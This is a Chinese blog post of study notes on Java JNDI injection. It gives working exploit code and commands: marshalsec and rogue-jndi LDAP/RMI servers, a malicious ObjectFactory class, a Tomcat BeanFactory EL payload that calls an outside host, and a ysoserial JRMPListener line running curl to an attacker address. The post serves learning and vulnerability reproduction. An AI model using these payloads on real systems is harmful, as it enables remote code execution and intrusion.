JNDI注入漏洞

最新推荐文章于 2024-12-18 15:04:18 发布
最新推荐文章于 2024-12-18 15:04:18 发布
阅读量1.5k 收藏 5
点赞数 1
文章标签: 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_61553520/article/details/130832696
版权

关于JNDI相关知识已经在上一篇博客中进行说明:JNDI学习笔记_貌美不及玲珑心,贤妻扶我青云志的博客-优快云博客

这一篇将主要学习JNDI注入漏洞的利用手法。

JNDI注入漏洞概述

JNDI是Java里独有的概念,因此JNDI注入也是Java中独有的一类安全漏洞。如果有应用程序进行了JNDI查询,并且其查询的地址或者名称攻击者可控的话,就会形成JNDI注入漏洞。

比如如下代码:

// env是用于创建InitialContext的环境变量属性配置
Hashtable env = new Hashtable();
// Context.INITIAL_CONTEXT_FACTORY即字符串java.naming.factory.initial
  env.put(Context.INITIAL_CONTEXT_FACTORY,"com.sun.jndi.rmi.registry.RegistryContextFactory");
// Context.PROVIDER_URL即字符串java.naming.provider.url
env.put(Context.PROVIDER_URL,"rmi://localhost:1099");
// 创建 InitialContext
InitialContext context = new InitialContext(env);
// 根据用户传递的参数 name 作为名字查询绑定的对象
Object obj = context.lookup(request.getParameter("name"));

尽管这里传递给InitialContext的Hashtable变量里已经设置了 java.naming.provider.url 为应用想访问的RMI服务地址,但实际上在执行lookup方法时,会对传递的name参数进行解析。如果name是一个完整的URL字符串的话,lookup的地址就会动态切换到name指定的地址。此时攻击者构造name参数的值为自己服务器的ip,应用程序就会向服务器发送请求。攻击者可以构造恶意的RMI或LDAP等命名目录服务,来使目标进行远程类加载,或者进行反序列化攻击,最终可以在目标服务器上执行恶意代码。

JNDI注入漏洞利用

JNDI注入漏洞的可利用手法:

  • 利用Reference加载远程Factory类
  • 利用Reference加载本地Factory类
  • 反序列化

利用Reference加载远程Factory类

利用流程:

  1. 攻击者构造RMI协议的URL字符串(对应攻击者构建的RMI服务地址)作为参数传入目标应用的 JNDI lookup方法中。
  2. 目标应用连接到攻击者指向的RMI服务,查询得到一个恶意的 JNDI Reference
  3. 目标应用对 JNDI Reference进行解析
  4. 根据Reference解析的结果,目标应用从攻击者控制的一个Web服务上下载Factory类的字节码
  5. 目标应用对下载得到的类字节码做初始化加载,攻击者的恶意代码被执行。

复现:

需要使用Marshalsec这款工具里已经集成有构建恶意RMI或LDAP服务的程序,这款工具的使用需要Java8的环境

项目地址:GitHub - mbechler/marshalsec

命令如下:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://vps-ip//#Exploit 389

这个命令会在389端口监听一个LDAP服务,当被攻击者对它进行 JNDI lookup 查询时,它会返回一个Reference。类加载地址指向http://vps-ip/Exploit.class,Exploit.class是攻击者自己编译的恶意Java代码经编译后得到的字节码。源码如下:

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class Exploit implements ObjectFactory {
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        java.lang.Runtime.getRuntime().exec(new String[] {"/bin/bash", "-c", "touch /tmp/pwned"});
        return null;
    }
}

被攻击者代码;

String jndiurl = "ldap://启动ldap服务的主机:389/Exploit";
Context ctx = new InitialContext();
ctx.lookup(jndiurl);

受害者值如下代码就会向向攻击者电脑(开启LDAP或者RMI)发送请求,返回一个Reference,类加载服务器上的恶意文件,Exploit.class文件里面的命令:touch /tmp/pwned 就会被执行

利用Reference加载本地Factory类

从高版本JDK开始,就禁止RMI和LDAP远程加载Factory类,但若是在目标依赖环境中可以找到危险的Factory,同样可以加载Factory类,完成代码执行。

可以Tomcat Server的一个类,org.apache.naming.factory.BeanFactory。由于该类的getObjectInstace方法进行了反射作用,所以可以通过利用它调用java.el.ELProcessor的eval方法,最后实现EL表达式来达到远程代码执行的效果。利用代码如下:

import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;
 
public class EvilRMIServerNew {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        Registry registry = LocateRegistry.createRegistry(1097);
 
        //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
        ref.add(new StringRefAddr("forceString", "x=eval"));
        //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()\")"));
 
        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("Object", referenceWrapper);
    }
}

这段代码启动了RMI服务,目标程序如果有Tomcat相关依赖,而且有作用类似下面的代码,就能来连接上恶意的RMI服务,最终通过构造表达式执行系统命令 nslookup jndi.s.artsploit.com

new InitialContext().lookup("rmi://evil_rmi_server:1097/Object");

出来这种方法,还有其它许多的危险的Factory类,都已经集成到GITHUB项目rogue-jndi中。

项目地址:GitHub - veracode-research/rogue-jndi: A malicious LDAP server for JNDI injection attacks

使用方法:

java -jar target/RogueJndi-1.0.jar --command "命令" --hostname 本机地址

在本地启动这些服务,然后在易受攻击的客户端上触发 JNDI 解析

反序列化

前面的两种方法是通过将恶意的Java对象绑定到RMI和JDAP这些命名目录服务上,是通过序列化特定的对象字节码来实现攻击的。还可以通过JNDI注入来实现反序列化攻击。

反序列化攻击可以借助ysoserial中的JRMPListener来完成。

项目地址:GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

使用方法:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonCollections6 "curl http://you-ip/"

会在本机1099端口经停JRMP服务(是RMI用到的底层协议),当受害者执行下面代码时,JRMP就会构建恶意的Commons Collection序列化数据返回给受害者客户端,如果受害者客户端存在有缺陷的Apache Commons Collection库,反序列化攻击就会成功,命令被执行。

String jndiurl = "ldap://you-ip:1099/Exploit";
Context ctx = new InitialContext();
ctx.lookup(jndiurl);

总结

基于Reference的远程/本地加载Factory类,攻击端需要启动LDAP/RMI目录服务,当攻击机请求之后,就会加载远程/本地的Factory来实现远程代码执行。

反序列化的利用则是直接注入恶意的序列化数据,来达到远程代码执行的目的。

用友NC Cloud及YonBIP PMCloudDriveProjectStateServlet JNDI注入漏洞复现
0xSec
01-30 1203
用友NC Cloud及YonBIP 系统PMCloudDriveProjectStateServlet.class接口处存在JNDI注入漏洞,未经身份验证的攻击者可通过此漏洞可以在服务端执行任意命令,获取服务器权限。
金蝶Apusic应用服务器 loadTree JNDI注入漏洞
Keepb1ue的博客
01-05 3096
金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入,远程加载恶意类,造成远程代码执行。
Log4j2的JNDI注入漏洞原理分析与思考
uuuyy_的博客
12-23 2894
前言 最近Log4j2的JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。 以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。 一、 前置知识 1.1 Log4j2 Log4j2是一个Java日志组件,被各类Java框架广泛地使用。它的前身是Log4j,Log4j2重新构建和设计了框架,可以认为两者是完全独立的两个日志组
JNDI注入原理及利用IDEA漏洞复现
人若无名,便可专心练剑
03-18 2796
本篇文章我也是看过很多的博客写的,中间也遇到很多问题,JNDI注入漏洞的危害还是蛮高的。下面我们从RMI以及DNS协议进行详细的漏洞分析,其中漏洞的危害原因主要是lookup()函数可控,可以执行恶意的命令,从而造成恶意攻击。
Fastjson反序列化漏洞——JNDI注入
2301_79096184的博客
09-17 2229
JNDI注入
漏洞深度分析|Apache Karaf 4.2.16 存在JNDI 注入漏洞
LJQClqjc的博客
12-23 1164
棱镜七彩漏洞深度分析
漏洞复现-Apache Kafka Clients JNDI注入漏洞 (CVE-2023-25194)
玄道的网安博客
08-11 651
在版本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞。如果攻击者在连接的时候可以控制属性sasl.jaas.config的值为com.sun.security.auth.module.JndiLoginModule,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。方法,做完客户端的判断和安全协议的判断之后,调用了。判断 SASL 模式是否开启,开启了才会往下跟进到。方法,跟进,发现其中还是加载了一些配置。方法,最后 Jndi 注入
log4j JNDI注入漏洞复现 CVE-2021-44228
m0_62284238的博客
09-12 514
{sys:java.version}.example.com,而又会解析到sys协议,获取到java.version参数,然后将这个参数值作为子域名的一部分去访问子域名。会通过jndi的lookup()解析dns://${sys:java.version}.example.com,解析到dns协议,会去访问。log4j提供了${}解析功能,当遇到${}时,会通过JNDI的lookup()解析其中的内容。如${jndi:dns://${sys:java.version}.example.com}
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
Log4j2的JNDI注入漏洞(CVE-2021-44228)
黑白的博客
10-13 6709
好好学习,天天向上。
JNDI漏洞利用探索
m0_67105288的博客
02-19 1308
最近学习了师傅寻找的一些JNDI漏洞的利用链受益匪浅,自己也尝试关于JNDI漏洞利用做一些挖掘,目前JNDI在利用过程我想到了两个问题。 测试每一个JNDI Bypass 利用链都需要手动更改URL很不方便,能否我去请求一个地址,让目标将我所有的链跑一遍? JNDI利用过程中可以通过反序列化利用,能否自动化探测反序列化利用链? 自动测试Bypass 利用链 为了让这种方式更加通用,我们首先考虑的是JDK原生的实现ObjectFactory的类,那么我注意到了下面几个类。 com.sun.jndi.r
JNDI RMI 注入(Log4j2漏洞
热门推荐
sun0322
12-24 1万+
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2)漏洞JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用版本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
JNDI 注入漏洞的前世今生
有价值炮灰
12-14 3762
前两天的 log4j 漏洞引起了安全圈的震动,虽然是二进制选手,但为了融入大家的过年氛围,还是决定打破舒适圈来研究一下 JNDI 注入漏洞JNDI 101 首先第一个问题,什么是 JNDI,它的作用是什么? 根据官方文档,JNDI 全称为 Java Naming and Directory Interface,即 Java 名称与目录接口。虽然有点抽象,但我们至少知道它是一个接口;下一个问题是,Naming 和 Directory 是什么意思?很多相关资料都对其语焉不详,但其实官方对其有详细解释。 N
JNDI注入漏洞的原理和复现
Locosomnus的博客
01-29 2235
一篇关于JNDI注入的学习笔记
log4j jndi注入漏洞
Ye的博客
04-06 1370
JNDI、LDAP、log for java: log4j Java程序日志监控组件
Log4j2-JNDI注入漏洞
weixin_44770698的博客
12-18 1189
Log4j2漏洞-JNDI
Apache Kafka Clients JNDI注入漏洞 (CVE-2023-25194) vulhub复现
qq_53003652的博客
07-14 1351
在版本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞。Apache Kafka是一个开源分布式消息队列,Kafka clients是相对应的Java客户端。base64编码后为dG91Y2ggL3RtcC9sbV9oYWNrZXI=,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。可以看到lm_hacker文件被成功创建(hacker是测试过的)启动kali:192.168.126.128。发送数据包,回到靶机,进入漏洞目录下。
jndi注入漏洞代码审计
最新发布
03-12
### 关于JNDI注入漏洞的代码审计 #### 审计方法概述 针对JNDI注入漏洞,有效的代码审计应当关注应用程序如何处理外部输入以及这些输入是否安全地传递给JNDI lookup操作。具体来说,在审查过程中要特别注意任何地方调用了`InitialContext.lookup()`或其他涉及动态资源定位的方法,并仔细检查传入参数是否受到充分验证和清理[^1]。 #### 常见风险点识别 - **未受控的数据流**:当程序允许不受信任方控制的部分参与构建用于查找命名对象的名字字符串时,则可能存在潜在的风险。 - **第三方库的影响**:某些框架或组件可能会间接引入此类问题,比如通过配置文件加载机制自动解析并应用环境变量中的设置来初始化内部使用的数据源等服务实例[^3]。 #### 使用静态分析工具辅助检测 为了提高效率并减少人为疏忽带来的遗漏,可以借助专门设计用来扫描Java项目中可能存在的安全隐患的专业软件来进行初步筛查: - SonarQube配合自定义规则集能够很好地适应不同企业的特定需求; - FindBugs及其后续者SpotBugs也提供了若干现成插件支持发现与防止多种类型的编程错误,包括但不限于不恰当的对象反序列化、危险函数调用等问题; - Checkmarx CxSAST则更侧重于从开发周期早期介入帮助企业建立完善的应用安全性保障体系。 除了上述提到的产品之外还有许多其他优秀的开源或者商业解决方案可供选择,实际选型应综合考虑成本效益比等因素做出决策。 ```java // 示例:避免直接使用不可信来源构造JNDI名称 String userInput = request.getParameter("db"); if (isValidDatabaseName(userInput)) { // 自定义合法性检验逻辑 Context ctx = new InitialContext(); DataSource ds = (DataSource)ctx.lookup("jdbc/" + sanitizeForJndi(userInput)); // 对输入做进一步净化处理 } ``` #### 实施最佳实践建议 - 尽量采用依赖注入的方式获取所需的服务接口实现而不是自行拼接URL去检索它们; - 如果确实有必要基于运行时条件决定目标地址的话,请务必先经过严格的白名单匹配再继续下一步动作; - 配合Web服务器层面的安全策略限制对外部网络请求发起权限,从而降低攻击面暴露程度; - 及时更新所依赖的所有包至最新稳定版以获得官方发布的修复补丁[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渐次登高

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值